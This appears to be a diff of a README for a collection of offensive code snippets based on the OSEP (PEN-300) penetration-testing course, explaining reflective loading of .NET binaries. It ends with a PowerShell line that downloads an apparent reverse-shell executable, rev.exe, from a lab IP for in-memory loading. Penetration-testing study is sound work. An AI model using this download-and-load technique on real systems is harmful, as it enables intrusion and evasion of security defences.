marcel-last/OSEP/README.md

 # OSEP Code Snippets
 Code examples are provided as-is, without any form of warranty.
 Based on Offensive Security's [PEN-300](https://www.offensive-security.com/pen300-osep/) course.

-Classes and methods are public, so most binaries should allow for reflective loading as below.
+Classes and methods are public, so most binaries should allow for reflective loading as below (modify `rev.Program` to ensure the correct namespace and public class is used).

 ```powershell
 $data = (New-Object System.Net.WebClient).DownloadData('http://10.10.10.10/rev.exe')